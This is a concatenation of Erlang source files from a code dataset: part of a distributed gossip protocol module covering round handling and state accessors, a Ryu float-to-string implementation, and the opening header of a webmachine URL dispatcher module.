check_round(OtherRound, CBModule, State) ->
MyRound = state_get({round, CBModule}, State),
?TRACE_ROUND("[ Gossip ] check_round. CBModule: ~w. MyRound: ~w. OtherRound: ~w",
[CBModule, MyRound, OtherRound]),
Leader = is_leader(state_get(range, State)),
case MyRound =:= OtherRound of
true when Leader ->
case is_end_of_round(CBModule, State) of
{true, State1} ->
State2 = state_update({round, CBModule}, fun (X) -> X+1 end, State1),
State3 = state_set({cycle, CBModule}, 0, State2),
{start_new_round, State3};
{false, State1} -> {ok, State1}
end;
true ->
{ok, State};
false when MyRound < OtherRound ->
State1 = state_set({round, CBModule}, OtherRound, State),
State2 = state_set({cycle, CBModule}, 0, State1),
{enter_new_round, State2};
false when MyRound > OtherRound ->
{propagate_new_round, State}
end.
%% checks the convergence of the current round (only called at leader)
-spec is_end_of_round(CBModule::cb_module(), State::state()) -> {boolean(), state()}.
is_end_of_round(CBModule, State) ->
Cycles = state_get({cycle, CBModule}, State),
?TRACE_ROUND("[ Gossip ] check_end_of_round. Cycles: ~w", [Cycles]),
{RoundHasConverged, State1} = cb_round_has_converged(CBModule, State),
IsEndOfRound = Cycles >= cb_config(min_cycles_per_round, CBModule) andalso
( ( Cycles >= cb_config(max_cycles_per_round, CBModule)) orelse
( RoundHasConverged ) ),
{IsEndOfRound, State1}.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% Range/Leader Handling
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% @doc Checks whether the node is the current leader.
-spec is_leader(MyRange::intervals:interval()) -> boolean().
is_leader(MyRange) ->
intervals:in(?RT:hash_key("0"), MyRange).
%% @doc Checks whether the node's range has changed, i.e. either the node
%% itself or its pred changed.
-spec rm_my_range_changed(OldNeighbors::nodelist:neighborhood(),
NewNeighbors::nodelist:neighborhood(),
IsSlide::rm_loop:reason()) -> boolean().
rm_my_range_changed(OldNeighbors, NewNeighbors, _IsSlide) ->
nodelist:node(OldNeighbors) =/= nodelist:node(NewNeighbors) orelse
nodelist:pred(OldNeighbors) =/= nodelist:pred(NewNeighbors).
%% @doc Notifies the node's gossip process of a changed range.
%% Used to subscribe to the ring maintenance.
-spec rm_send_new_range(Subscriber::pid(), Tag::?MODULE,
OldNeighbors::nodelist:neighborhood(),
NewNeighbors::nodelist:neighborhood(),
Reason::rm_loop:reason()) -> ok.
rm_send_new_range(Pid, ?MODULE, _OldNeighbors, NewNeighbors, _Reason) ->
NewRange = nodelist:node_range(NewNeighbors),
comm:send_local(Pid, {update_range, NewRange}).
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% State: Getters and Setters
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% @doc Gets the value for the given key from the given state.
%% Allowed keys:
%% <ul>
%% <li>`cb_modules', all active callback modules,</li>
%% <li>`cb_states', the states of all callback modules ,</li>
%% <li>`cb_stati', stati of all callback modules ,</li>
%% <li>`cycles', the cycles of all callback modules ,</li>
%% <li>`exch_datas', the exch_data of all callback modules ,</li>
%% <li>`msg_queue', the message queue of the gossip module, </li>
%% <li>`range', the key range of the node, </li>
%% <li>`reply_peers', all reply_peers, </li>
%% <li>`rounds', rounds of all callback modules ,</li>
%% <li>`status', the status of the gossip module, </li>
%% <li>`trigger_add', triggers to be added on next trigger, </li>
%% <li>`trigger_groups', a list of all trigger groups, </li>
%% <li>`trigger_groups', a list of all trigger locks, </li>
%% <li>`trigger_remove', triggers to be removed on next trigger, </li>
%% </ul>
%% The entries of the following keys are specified by a {Key, SecondaryKey}
%% Tuple, allowing to have more than one entry per key. These are implemented
%% as Tuplelists of [{SecondaryKey, Value}] and accessed by the singular of
%% the key of the according record field (e.g. "groups" -> "group").
%% <ul>
%% <li>`{cb_state, CBModule}', the state of the given callback module, </li>
%% <li>`{cb_status, CBModule}', indicates, if `init()' was called on given
%% callback module, </li>
% <li>`{cycle, CBModule}', the cycle counter for the given callback module, </li>
%% <li>`{exch_data, CBModule}', a tuple of the data to exchange and the peer to
%% exchange the data with. </li>
%% <li>`{round, CBModule}', the round of the given callback module, </li>
%% <li>`{reply_peer, Ref}', the peer to send the g2p_exch_reply to, </li>
%% <li>`{trigger_group, TriggerInterval}', the trigger group (i.e. a list
%% of callback modules) to the given TriggerInterval, </li>
%% <li>`{trigger_lock, CBModule}', locks triggering while within prepare-request
%% phase for the given callback module, </li>
%% </ul>
-spec state_get(cb_modules, state()) -> [cb_module()];
(cb_states, state()) -> [{cb_module(), any()}];
(cb_stati, state()) -> [{cb_module(), cb_status()}];
(cycles, state()) -> [{cb_module(), non_neg_integer()}];
(exch_datas, state()) -> [{cb_module(), exch_data()}];
(msg_queue, state()) -> msg_queue:msg_queue();
(range, state()) -> intervals:interval();
(reply_peers, state()) -> [{Ref::pos_integer(), Pid::comm:mypid()}];
(rounds, state()) -> [{cb_module(), non_neg_integer()}];
(status, state()) -> status();
(trigger_add, state()) -> [pos_integer()];
(trigger_groups, state()) -> [{TriggerInterval::pos_integer(), CBModules::[cb_module()]}];
(trigger_locks, state()) -> [{cb_module(), locked | free}];
(trigger_remove, state()) -> [pos_integer()];
({cb_state, cb_module()}, state()) -> any();
({cb_status, cb_module()}, state()) -> cb_status() | false;
({cycle, cb_module()}, state()) -> non_neg_integer() | false;
({exch_data, cb_module()}, state()) -> exch_data() | false;
({round, cb_module()}, state()) -> non_neg_integer() | false;
({trigger_group, TriggerInterval::pos_integer()}, state()) -> [cb_module()] | false;
({trigger_lock, cb_module()}, state()) -> locked | free | false.
state_get(cb_modules, State=#state{cb_modules=CBModules}) when is_record(State, state) ->
CBModules;
state_get(cb_states, State=#state{cb_states=CBStates}) when is_record(State, state) ->
CBStates;
state_get(cb_stati, State=#state{cb_stati=CBStati}) when is_record(State, state) ->
CBStati;
state_get(cycles, State=#state{cycles=Cycles}) when is_record(State, state) ->
Cycles;
state_get(exch_datas, State=#state{exch_datas=ExchDatas}) when is_record(State, state) ->
ExchDatas;
state_get(msg_queue, State=#state{msg_queue=MsgQueue}) when is_record(State, state) ->
MsgQueue;
state_get(range, State=#state{range=Range}) when is_record(State, state) ->
Range;
state_get(reply_peers, State=#state{reply_peers=ReplyPeers}) when is_record(State, state) ->
ReplyPeers;
state_get(rounds, State=#state{rounds=Round}) when is_record(State, state) ->
Round;
state_get(status, State=#state{status=Status}) when is_record(State, state) ->
Status;
state_get(trigger_add, State=#state{trigger_add=Triggers}) when is_record(State, state) ->
Triggers;
state_get(trigger_groups, State=#state{trigger_groups=TriggerGroups}) when is_record(State, state) ->
TriggerGroups;
state_get(trigger_locks, State=#state{trigger_locks=TriggerLocks}) when is_record(State, state) ->
TriggerLocks;
state_get(trigger_remove, State=#state{trigger_remove=Triggers}) when is_record(State, state) ->
Triggers;
state_get({cb_state, CBModule}, State=#state{cb_states=CBStates}) when is_record(State, state) ->
state_get_helper(CBModule, CBStates);
state_get({cb_status, CBModule}, State=#state{cb_stati=CBStati}) when is_record(State, state) ->
state_get_helper(CBModule, CBStati);
state_get({cycle, CBModule}, State=#state{cycles=Cycles}) when is_record(State, state) ->
state_get_helper(CBModule, Cycles);
state_get({exch_data, CBModule}, State=#state{exch_datas=ExchDatas}) when is_record(State, state) ->
state_get_helper(CBModule, ExchDatas);
state_get({round, CBModule}, State=#state{rounds=Round}) when is_record(State, state) ->
state_get_helper(CBModule, Round);
state_get({trigger_group, Interval}, State=#state{trigger_groups=TriggerGroups}) when is_record(State, state) ->
state_get_helper(Interval, TriggerGroups);
state_get({trigger_lock, CBModule}, State=#state{trigger_locks=TriggerLocks}) when is_record(State, state) ->
state_get_helper(CBModule, TriggerLocks).
%% @doc Helper for state_get, extracts a value to the given (secondary) key from the given Tuplelist
-spec state_get_helper(pos_integer() | cb_module() , [{cb_module()|pos_integer(), ValueType::any()}]) -> ValueType::any().
state_get_helper(Key, TupleList) when is_list(TupleList) ->
case lists:keyfind(Key, 1, TupleList) of
{Key, Value} -> Value;
false -> false
end.
%% @doc Sets the given value for the given key in the given state.
%% For a description of the keys see state_get/2.
-spec state_set(cb_modules, [cb_module()], state()) -> state();
(msg_queue, msg_queue:msg_queue(), state()) -> state();
(range, intervals:interval(), state()) -> state();
(status, status(), state()) -> state();
(trigger_add, [pos_integer()], state()) -> state();
(trigger_remove, [pos_integer()], state()) -> state();
({cb_state, cb_module()}, any(), state()) -> state();
({cb_status, cb_module()}, cb_status(), state()) -> state();
({cycle, cb_module()}, non_neg_integer(), state()) -> state();
({exch_data, cb_module()}, exch_data(), state()) -> state();
({reply_peer, Ref::pos_integer()}, comm:mypid(), state()) -> state();
({round, cb_module()}, non_neg_integer(), state()) -> state();
({trigger_group, TriggerInterval::pos_integer()}, [cb_module()], state()) -> state();
({trigger_lock, cb_module()}, locked | free, state()) -> state().
state_set({Key, SecondaryKey}, Value, State) when is_record(State, state) ->
List = case Key of
cb_state -> State#state.cb_states;
cb_status -> State#state.cb_stati;
cycle -> State#state.cycles;
exch_data -> State#state.exch_datas;
reply_peer -> State#state.reply_peers;
round -> State#state.rounds;
trigger_group -> State#state.trigger_groups;
trigger_lock -> State#state.trigger_locks
end,
List1 = lists:keystore(SecondaryKey, 1, List, {SecondaryKey, Value}),
case Key of
cb_state -> State#state{cb_states=List1};
cb_status -> State#state{cb_stati=List1};
cycle -> State#state{cycles=List1};
exch_data -> State#state{exch_datas=List1};
reply_peer -> State#state{reply_peers=List1};
round -> State#state{rounds=List1};
trigger_group -> State#state{trigger_groups=List1};
trigger_lock -> State#state{trigger_locks=List1}
end;
state_set(Key, Value, State) when is_record(State, state) ->
case Key of
cb_modules -> State#state{cb_modules = Value};
msg_queue -> State#state{msg_queue = Value};
range -> State#state{range = Value};
status -> State#state{status = Value};
trigger_add -> State#state{trigger_add = Value};
trigger_remove -> State#state{trigger_remove = Value}
end.
%% @doc Remove callback module dependent entries from state.
-spec state_remove_cb(cb_module(), state()) -> state().
state_remove_cb(CBModule, State) when is_record(State, state) ->
State1 = State#state{cb_states=lists:keydelete(CBModule, 1, State#state.cb_states)},
State2 = State1#state{cb_stati=lists:keydelete(CBModule, 1, State1#state.cb_stati)},
State3 = State2#state{cycles=lists:keydelete(CBModule, 1, State2#state.cycles)},
State4 = State3#state{exch_datas=lists:keydelete(CBModule, 1, State3#state.exch_datas)},
State5 = State4#state{rounds=lists:keydelete(CBModule, 1, State4#state.rounds)},
State5#state{trigger_locks=lists:keydelete(CBModule, 1, State5#state.trigger_locks)}.
%% @doc Remove the entry of the given key.
-spec state_remove(Key::{cb_status, SecondaryKey::cb_module()}, state()) -> state().
state_remove({cb_status, CBModule}, #state{cb_stati=CBStati}=State) when is_record(State, state) ->
CBStati1 = lists:keydelete(CBModule, 1, CBStati),
State#state{cb_stati=CBStati1}.
%% @doc Updates an entry with the given update function
%% For a description of the keys see state_get/2.
-spec state_update(cb_modules, UpdateFun::fun(), state()) -> state();
(msg_queue, UpdateFun::fun(), state()) -> state();
(range, UpdateFun::fun(), state()) -> state();
(status, UpdateFun::fun(), state()) -> state();
(trigger_add, UpdateFun::fun(), state()) -> state();
(trigger_remove, UpdateFun::fun(), state()) -> state();
({cycle, cb_module()}, UpdateFun::fun(), state()) -> state();
({reply_peer, Ref::pos_integer()}, UpdateFun::fun(), state()) -> state();
({round, cb_module()}, UpdateFun::fun(), state()) -> state();
({trigger_group, TriggerInterval::pos_integer()}, UpdateFun::fun(), state()) -> state();
({cb_state, cb_module()}, UpdateFun::fun(), state()) -> state().
state_update(Key, Fun, State) when is_record(State, state) ->
NewValue = apply(Fun, [state_get(Key, State)]),
state_set(Key, NewValue, State).
%% @doc Retrieve and remove the reply peer given by the Ref from the state.
-spec take_reply_peer(Ref::pos_integer(), State::state()) -> {comm:mypid()|none, state()}.
take_reply_peer(Ref, #state{reply_peers=Peers}=State) when is_record(State, state) ->
case lists:keytake(Ref, 1, Peers) of
false -> {none, State};
{value, {Ref, Peer}, Rest} -> {Peer, State#state{reply_peers=Rest}}
end.
%% @doc Gets all the tombstones from the state of the gossip module.
-spec get_tombstones(State::state()) -> [cb_module()].
get_tombstones(State) ->
[CBModule || {CBModule, tombstone} <- state_get(cb_stati, State)].
%%------------------------- Message Queue --------------------------%%
%% add to message queue and create message queue if necessary
-spec msg_queue_add(Msg::message(), State::state()) -> state().
msg_queue_add(Msg, State) ->
MsgQueue1 = state_get(msg_queue, State),
MsgQueue2 = msg_queue:add(MsgQueue1, Msg),
state_set(msg_queue, MsgQueue2, State).
%% send the messages from the current message queue and create a new message queue
-spec msg_queue_send(State::state()) -> state().
msg_queue_send(State) ->
msg_queue:send(state_get(msg_queue, State)),
state_set(msg_queue, msg_queue:new(), State).
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% Misc
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% provide some debug information for the gossip moudle (to be added to the
%% information of a the callback modules)
-spec web_debug_info(State::state()) -> [{any(), any()}, ...].
web_debug_info(State) ->
CBModules = state_get(cb_modules, State),
Tombstones = get_tombstones(State),
_KeyValueList =
[{"behaviour module", ""},
{"msg_queue_len", length(state_get(msg_queue, State))},
{"status", state_get(status, State)},
{"registered modules", to_string(CBModules)},
{"trigger groups", to_string(state_get(trigger_groups, State))},
{"cycles", to_string(state_get(cycles, State))},
{"tombstones", to_string(Tombstones)}
].
%% @doc String conversion for sane outputs and debugging
-spec to_string(list()|state()) -> string().
%% Returns a list as string
to_string(List) when is_list(List) ->
lists:flatten(io_lib:format("~w", [List]));
%% returns the state as string (comment/uncomment as necessary to control output)
to_string(State) when is_record(State, state) ->
_CBModules = state_get(cb_modules, State),
_CBStates = state_get(cb_states, State),
RawMsgQueue = state_get(msg_queue, State),
_Range = state_get(range, State),
_Status = state_get(status, State),
_TriggerAdd = state_get(trigger_add, State),
_TriggerGroups = state_get(trigger_groups, State),
_TriggerLocks = state_get(trigger_locks, State),
_TriggerRemove = state_get(trigger_remove, State),
_CBStati = state_get(cb_stati, State),
_Cycles = state_get(cycles, State),
_ExchDatas = state_get(exch_datas, State),
_ReplyPeers = state_get(reply_peers, State),
_Rounds = state_get(rounds, State),
%% _MsgQueue = RawMsgQueue,
_MsgQueue = lists:map(fun(Tuple) -> {element(1, Tuple), '...'} end, RawMsgQueue),
Str =
io_lib:format("State: ~n", []) ++
io_lib:format("\tCBModules: ~w~n", [_CBModules]) ++
io_lib:format("\tMsgQueue: ~w~n", [_MsgQueue]) ++
io_lib:format("\tRange: ~w~n", [_Range]) ++
io_lib:format("\tStatus: ~w~n", [_Status]) ++
io_lib:format("\tTriggerAdd: ~w~n", [_TriggerAdd]) ++
io_lib:format("\tTriggerRemove: ~w~n", [_TriggerRemove]) ++
io_lib:format("\tReplyPeers: ~w~n", [_ReplyPeers]) ++
io_lib:format("\tTriggerGroups: ~w~n", [_TriggerGroups]) ++
io_lib:format("\tTriggerLocks: ~w~n", [_TriggerLocks]) ++
io_lib:format("\tCBStati: ~w~n", [_CBStati]) ++
io_lib:format("\tCycles: ~w~n", [_Cycles]) ++
io_lib:format("\tRounds: ~w~n", [_Rounds]) ++
%% io_lib:format("\tExchDatas: ~w~n", [_ExchDatas]) ++
%% io_lib:format("\tCBStates: ~w~n", [_CBStates]) ++
io_lib:format("", []),
lists:flatten(Str).
%% @doc Check the config of the gossip module. <br/>
%% Calls the check_config functions of all callback modules.
-spec check_config() -> boolean().
check_config() ->
lists:foldl(fun({Module, _Args}, Acc) -> Acc andalso Module:check_config() end, true, ?CBMODULES).
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% Testing and Debugging
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% @doc Globally starts a gossip task identified by CBModule. <br/>
%% Args is passed to the init function of the callback module. <br/>
%% CBModule is either the name of a callback module or an name-instance_id
%% tuple.
-spec start_gossip_task(GossipTask, Args) -> ok when
is_subtype(GossipTask, cb_module_name() | cb_module()),
is_subtype(Args, list(proplists:property())).
start_gossip_task(ModuleName, Args) when is_atom(ModuleName) ->
Id = uid:get_global_uid(),
start_gossip_task({ModuleName, Id}, Args);
start_gossip_task({ModuleName, Id}, Args) when is_atom(ModuleName) ->
Msg = {?send_to_group_member, gossip,
{start_gossip_task, {ModuleName, Id}, Args}},
bulkowner:issue_bulk_owner(uid:get_global_uid(), intervals:all(), Msg).
%% @doc Globally stop a gossip task.
-spec stop_gossip_task(CBModule::cb_module()) -> ok.
stop_gossip_task(CBModule) ->
Msg = {?send_to_group_member, gossip, {stop_gossip_task, CBModule}},
bulkowner:issue_bulk_owner(uid:get_global_uid(), intervals:all(), Msg).
%% hack to be able to suppress warnings when testing via config:write()
-spec warn() -> log:log_level().
warn() ->
case config:read(gossip_log_level_warn) of
failed -> info;
Level -> Level
end.
%% hack to be able to suppress warnings when testing via config:write()
-compile({nowarn_unused_function, {error, 0}}).
-spec error() -> log:log_level().
error() ->
case config:read(gossip_log_level_error) of
failed -> warn;
Level -> Level
end.
%% @doc Value creater for type_check_SUITE.
-spec tester_create_cb_module_names(1) -> cb_module_name().
tester_create_cb_module_names(1) ->
gossip_load.
-compile({nowarn_unused_function, {init_gossip_task_feeder, 3}}).
-spec init_gossip_task_feeder(cb_module(), NoOfBuckets::gossip_load:histogram_size(), state())
-> {cb_module(), list(), state()}.
init_gossip_task_feeder(CBModule, NoOfBuckets, State) ->
%% note: gossip_load (the only supported cb_module for now) requires an
%% integer NoOfBuckets parameter
%% (other modules may have different parameters)
{CBModule, [NoOfBuckets], State}. | src/gossip.erl | 0.571647 | 0.507812 | gossip.erl | starcoder |
%%%-------------------------------------------------------------------
%% @doc Implements the Ryu algorithm for f64 binaries
%%
%% This has been extracted from OTP 24, and is mostly present here as a reference implementation.
%% @end
%%%-------------------------------------------------------------------
-module(ken_ryu_f64).
-export([fwrite_g/1]).
%% Returns a correctly rounded string that converts to Float when
%% read back with list_to_float/1.
%%
%% When abs(Float) < float(1 bsl 53) the shortest such string is
%% returned, and otherwise the shortest such string using scientific
%% notation is returned. That is, scientific notation is used if and
%% only if scientific notation results in a shorter string than
%% normal notation when abs(Float) < float(1 bsl 53), and scientific
%% notation is used unconditionally if abs(Float) >= float(1 bsl
%% 53). See comment in insert_decimal/2 for an explanation for why
%% float(1 bsl 53) is chosen as cutoff point.
%%
%% The algorithm that is used to find the decimal number that is
%% represented by the returned String is described in "Ryu: Fast
%% Float-to-String Conversion" in Proceedings of 39th ACM SIGPLAN
%% Conference on Programming Language Design and Implementation.
%% https://dl.acm.org/doi/pdf/10.1145/3192366.3192369
-spec fwrite_g(binary()) -> iodata().
fwrite_g(Float) ->
case sign_mantissa_exponent(Float) of
{0, 0, 0} ->
"0.0";
{1, 0, 0} ->
"-0.0";
{S, M, E} when E < 2047 ->
{Place, Digits} =
case is_small_int(M, E) of
{int, M1, E1} ->
compute_shortest_int(M1, E1);
not_int ->
fwrite_g_1(M, E)
end,
DigitList = insert_decimal(Place, Digits, Float),
insert_minus(S, DigitList)
end.
-define(BIG_POW, (1 bsl 52)).
-define(DECODE_CORRECTION, 1075).
sign_mantissa_exponent(<<S:1, BE:11, M:52>>) ->
% <<S:1, BE:11, M:52>> = <<F:64/float>>,
{S, M, BE}.
is_small_int(M, E) ->
M2 = ?BIG_POW bor M,
E2 = E - ?DECODE_CORRECTION,
case E2 > 0 orelse E2 < -52 of
true ->
%% f = m2 * 2^e2 >= 2^53 is an integer.
%% Ignore this case for now.
%% or f < 1
not_int;
_ ->
%% Since 2^52 <= m2 < 2^53 and 0 <= -e2 <= 52: 1 <= f = m2 / 2^-e2 < 2^53.
%% Test if the lower -e2 bits of the significand are 0, i.e. whether the fraction is 0.
Mask = (1 bsl -E2) - 1,
Fraction = M2 band Mask,
case Fraction of
0 ->
%% f is an integer in the range [1, 2^53).
%% Note: mantissa might contain trailing (decimal) 0's.
{int, M2 bsr -E2, 0};
_ ->
not_int
end
end.
%% For small integers in the range [1, 2^53), v.mantissa might contain trailing (decimal) zeros.
compute_shortest_int(M, E) when M rem 10 =:= 0 ->
Q = M div 10,
compute_shortest_int(Q, E + 1);
compute_shortest_int(M, E) ->
{E, integer_to_binary(M)}.
fwrite_g_1(M, E) ->
{Mf, Ef} = decode(M, E),
Shift = mmshift(M, E),
Mv = 4 * Mf,
{Q, Vm, Vr, Vp, E10} = convert_to_decimal(Ef, Mv, Shift),
Accept = M rem 2 == 0,
{VmIsTrailingZero, VrIsTrailingZero, Vp1} = bounds(Mv, Q, Vp, Accept, Ef, Shift),
{D1, E1} = compute_shortest(Vm, Vr, Vp1, VmIsTrailingZero, VrIsTrailingZero, Accept),
{E1 + E10, integer_to_binary(D1)}.
decode(Mantissa, 0) ->
{Mantissa, 1 - ?DECODE_CORRECTION - 2};
decode(Mantissa, Exponent) ->
{Mantissa + ?BIG_POW, Exponent - ?DECODE_CORRECTION - 2}.
mmshift(0, E) when E > 1 ->
0;
mmshift(_M, _E) ->
1.
convert_to_decimal(E2, Mv, Shift) when E2 >= 0 ->
Q = max(0, ((E2 * 78913) bsr 18) - 1),
Mul = ken_ryu_table_f64:inv_value(Q),
K = ken_ryu_table_f64:pow5_inv_bitcount() + pow5bits(Q) - 1,
I = -E2 + Q + K,
{Vm, Vr, Vp} = mulShiftAll(Mv, Shift, I, Mul),
{Q, Vm, Vr, Vp, Q};
convert_to_decimal(E2, Mv, Shift) when E2 < 0 ->
Q = max(0, ((-E2 * 732923) bsr 20) - 1),
I = -E2 - Q,
K = pow5bits(I) - ken_ryu_table_f64:pow5_bitcount(),
From_file = ken_ryu_table_f64:value(I),
J = Q - K,
{Vm, Vr, Vp} = mulShiftAll(Mv, Shift, J, From_file),
E10 = E2 + Q,
{Q, Vm, Vr, Vp, E10}.
pow5bits(E) ->
((E * 1217359) bsr 19) + 1.
mulShiftAll(Mv, Shift, J, Mul) ->
A = mulShift64(Mv - 1 - Shift, Mul, J),
B = mulShift64(Mv, Mul, J),
C = mulShift64(Mv + 2, Mul, J),
{A, B, C}.
mulShift64(M, Mul, J) ->
(M * Mul) bsr J.
bounds(Mv, Q, Vp, _Accept, E2, _Shift) when E2 >= 0, Q =< 21, Mv rem 5 =:= 0 ->
{false, multipleOfPowerOf5(Mv, Q), Vp};
bounds(Mv, Q, Vp, true, E2, Shift) when E2 >= 0, Q =< 21 ->
{multipleOfPowerOf5(Mv - 1 - Shift, Q), false, Vp};
bounds(Mv, Q, Vp, _Accept, E2, _Shift) when E2 >= 0, Q =< 21 ->
{false, false, Vp - vpmodifier(multipleOfPowerOf5(Mv + 2, Q))};
bounds(_Mv, Q, Vp, true, E2, Shift) when E2 < 0, Q =< 1 ->
{Shift =:= 1, true, Vp};
bounds(_Mv, Q, Vp, false, E2, _Shift) when E2 < 0, Q =< 1 ->
{false, true, Vp - 1};
bounds(Mv, Q, Vp, _Accept, E2, _Shift) when E2 < 0, Q < 63 ->
{false, Mv band ((1 bsl Q) - 1) =:= 0, Vp};
bounds(_Mv, _Q, Vp, _Accept, _E2, _Shift) ->
{false, false, Vp}.
multipleOfPowerOf5(Value, Q) ->
pow5factor(Value) >= Q.
pow5factor(Val) ->
pow5factor(Val div 5, 0).
pow5factor(Val, Count) when Val rem 5 /= 0 ->
Count;
pow5factor(Val, Count) ->
pow5factor(Val div 5, Count + 1).
vpmodifier(true) ->
1;
vpmodifier(false) ->
0.
compute_shortest(Vm, Vr, Vp, false, false, _Accept) ->
{Vm1, Vr1, Removed, RoundUp} = general_case(Vm, Vr, Vp, 0, false),
Output = Vr1 + handle_normal_output_mod(Vr1, Vm1, RoundUp),
{Output, Removed};
compute_shortest(Vm, Vr, Vp, VmIsTrailingZero, VrIsTrailingZero, Accept) ->
{Vm1, Vr1, Removed, LastRemovedDigit} =
handle_trailing_zeros(Vm, Vr, Vp, VmIsTrailingZero, VrIsTrailingZero, 0, 0),
Output =
Vr1 + handle_zero_output_mod(Vr1, Vm1, Accept, VmIsTrailingZero, LastRemovedDigit),
{Output, Removed}.
general_case(Vm, Vr, Vp, Removed, RoundUp) when Vp div 100 =< Vm div 100 ->
general_case_10(Vm, Vr, Vp, Removed, RoundUp);
general_case(Vm, Vr, Vp, Removed, _RU) ->
VmD100 = Vm div 100,
VrD100 = Vr div 100,
VpD100 = Vp div 100,
RoundUp = Vr rem 100 >= 50,
general_case_10(VmD100, VrD100, VpD100, 2 + Removed, RoundUp).
general_case_10(Vm, Vr, Vp, Removed, RoundUp) when Vp div 10 =< Vm div 10 ->
{Vm, Vr, Removed, RoundUp};
general_case_10(Vm, Vr, Vp, Removed, _RU) ->
VmD10 = Vm div 10,
VrD10 = Vr div 10,
VpD10 = Vp div 10,
RoundUp = Vr rem 10 >= 5,
general_case_10(VmD10, VrD10, VpD10, 1 + Removed, RoundUp).
handle_normal_output_mod(Vr, Vm, RoundUp) when (Vm =:= Vr) or RoundUp ->
1;
handle_normal_output_mod(_Vr, _Vm, _RoundUp) ->
0.
handle_trailing_zeros(Vm, Vr, Vp, VmTZ, VrTZ, Removed, LastRemovedDigit) when
(Vp div 10) =< (Vm div 10)
->
vmIsTrailingZero(Vm, Vr, Vp, VmTZ, VrTZ, Removed, LastRemovedDigit);
handle_trailing_zeros(
Vm,
Vr,
Vp,
VmIsTrailingZero,
VrIsTrailingZero,
Removed,
LastRemovedDigit
) ->
VmTZ = VmIsTrailingZero and ((Vm rem 10) =:= 0),
VrTZ = VrIsTrailingZero and (LastRemovedDigit =:= 0),
handle_trailing_zeros(
Vm div 10,
Vr div 10,
Vp div 10,
VmTZ,
VrTZ,
1 + Removed,
Vr rem 10
).
vmIsTrailingZero(Vm, Vr, _Vp, false = _VmTZ, VrTZ, Removed, LastRemovedDigit) ->
handle_50_dotdot_0(Vm, Vr, VrTZ, Removed, LastRemovedDigit);
vmIsTrailingZero(Vm, Vr, _Vp, _VmTZ, VrTZ, Removed, LastRemovedDigit) when
(Vm rem 10) /= 0
->
handle_50_dotdot_0(Vm, Vr, VrTZ, Removed, LastRemovedDigit);
vmIsTrailingZero(Vm, Vr, Vp, VmTZ, VrTZ, Removed, LastRemovedDigit) ->
vmIsTrailingZero(
Vm div 10,
Vr div 10,
Vp div 10,
VmTZ,
LastRemovedDigit == 0 andalso VrTZ,
1 + Removed,
Vr rem 10
).
handle_50_dotdot_0(Vm, Vr, true, Removed, 5) when (Vr rem 2) =:= 0 ->
{Vm, Vr, Removed, 4};
handle_50_dotdot_0(Vm, Vr, _VrTZ, Removed, LastRemovedDigit) ->
{Vm, Vr, Removed, LastRemovedDigit}.
handle_zero_output_mod(_Vr, _Vm, _Accept, _VmTZ, LastRemovedDigit) when
LastRemovedDigit >= 5
->
1;
handle_zero_output_mod(Vr, Vm, Accept, VmTZ, _LastRemovedDigit) when
Vr =:= Vm, ((not Accept) or not (VmTZ))
->
1;
handle_zero_output_mod(_Vr, _Vm, _Accept, _VmTZ, _LastRemovedDigit) ->
0.
insert_decimal(Place, S, F) ->
<<Float/float>> = F,
L = byte_size(S),
Exp = Place + L - 1,
ExpL = integer_to_binary(Exp),
ExpCost = byte_size(ExpL) + 2,
if
Place < 0 ->
if
Exp >= 0 ->
S0_size = L + Place,
<<S0:S0_size/binary, S1/binary>> = S,
[S0, $., S1];
2 - Place - L =< ExpCost ->
["0.", binary:copy(<<$0>>, -Place - L), S];
true ->
insert_exp(ExpL, S)
end;
true ->
Dot =
if
L =:= 1 ->
1;
true ->
0
end,
%% All integers in the range [-2^53, 2^53] can
if
%% be stored without loss of precision in an
%% IEEE 754 64-bit double but 2^53+1 cannot be
%% stored in an IEEE 754 64-bit double without
%% loss of precision (float((1 bsl 53)+1) =:=
%% float(1 bsl 53)). It thus makes sense to
%% show floats that are >= 2^53 or <= -2^53 in
%% scientific notation to indicate that the
%% number is so large that there could be loss
%% in precion when adding or subtracting 1.
%%
%% https://stackoverflow.com/questions/1848700/biggest-integer-that-can-be-stored-in-a-double?answertab=votes#tab-top
ExpCost + Dot >= Place + 2 andalso abs(Float) < float(1 bsl 53) ->
[S, binary:copy(<<$0>>, Place), ".0"];
true ->
insert_exp(ExpL, S)
end
end.
insert_exp(ExpL, <<C:1/binary>>) ->
[C, ".0e", ExpL];
insert_exp(ExpL, <<C:1/binary, S/binary>>) ->
[C, $., S, $e, ExpL].
insert_minus(0, Digits) ->
Digits;
insert_minus(1, Digits) ->
[$-, Digits]. | src/ken_ryu_f64.erl | 0.719581 | 0.626952 | ken_ryu_f64.erl | starcoder |
%% @author <NAME> <<EMAIL>>
%% @author <NAME> <<EMAIL>>
%% @copyright 2007-2009 Basho Technologies
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
%% @doc Module for URL-dispatch by pattern matching.
-module(webmachine_dispatcher).
-author('<NAME> <<EMAIL>>').
-author('<NAME> <<EMAIL>>').
-author('<NAME> <<EMAIL>>').
-export([dispatch/2, dispatch/3]).
